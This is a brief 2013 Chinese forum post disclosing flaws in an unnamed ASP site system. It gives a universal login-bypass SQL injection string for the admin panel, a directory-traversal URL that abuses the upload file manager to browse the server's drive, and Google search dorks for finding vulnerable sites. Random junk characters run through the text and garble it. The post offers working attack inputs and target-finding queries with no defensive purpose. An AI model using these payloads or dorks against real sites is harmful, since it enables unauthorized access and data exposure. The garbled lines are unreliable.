后台万能密码 'or'='or'
# N* K* Q9 b! h* a8 G" o8 j1 V, t! B2 w% F; I$ E% b+ N
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!' e" s" m" B! p0 S0 N
admin/uploadfile.asp?currentFolder=/upfiles/../
. @! s p7 v, f4 c$ Y7 D" S% i+ `& r& [" p, ]: U
漏洞证明:: I$ [4 w# Z, p# j& d
, W4 D5 ]' [6 Z5 x/ Y谷歌:inurl:type.asp?id=1 新闻中心 N0 z& Y m/ a- R5 M4 v
或者 :inurl:download_ok.asp?
9 T" i, c6 `3 G7 O* U9 w( q; B$ ~/ p! I" ^( `' r$ a
|
发表于 2013-3-14 20:17:32
收藏
支持
反对